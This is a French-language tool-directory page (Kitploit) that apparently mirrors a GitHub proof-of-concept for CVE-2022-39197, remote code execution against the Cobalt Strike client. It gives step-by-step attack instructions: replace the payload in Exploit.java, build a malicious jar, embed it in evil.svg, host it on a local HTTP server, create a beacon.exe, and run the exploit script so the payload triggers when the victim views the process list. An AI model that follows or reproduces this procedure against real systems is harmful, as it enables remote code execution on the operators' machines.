Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/thecryinggame/cve-2022-39197-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleDéveloppement de Charges Utiles
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

POC RCE CVE-2022-39197

Voir le dépôt
13454il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-39197-RCE

Premièrement

Ce projet a été modifié à partir du projet @its-arun https://github.com/its-arun/CVE-2022-39197

Lorsque j'ai testé le script, j'ai constaté que le script frida ne pouvait pas interroger les données dans l'ordre normal. La méthode consiste à modifier le script frida pour changer le nom du processus.

Merci au Maître @Kai5174 pour sa contribution à la méthode d'utilisation.

Utilisation

  • Préparer le Payload

1、Modifiez la commande exécutée avec votre payload dans EvilJar/src/main/java/Exploit.java, actuellement il ne peut que lancer la calculatrice.

2、Construisez le jar avec mvn clean compile assembly:single

4、Déplacez EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ vers le dossier serve/

5、Modifiez serve\evil.svg et remplacez

Télécharger l’outil
[attacker]

6、Servez avec python3 -m http.server 8080

7、Générez beacon.exe avec une version de C2 inférieure ou égale à 4.7

8、Vous devez exécuter le script py sur Windows pour vous connecter, et prendre des contre-mesures lorsque le client accède à la liste des processus et voit le processus beacon.exe.

  • Exécuter l'exploit
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

Le Payload sera déclenché dès que l'utilisateur fera défiler la liste des processus.

POC

Windows 1.png

Mac 2.jpg

Références

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Il y a une excellente analyse approfondie de cette vulnérabilité https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Modifié https://github.com/its-arun/CVE-2022-39197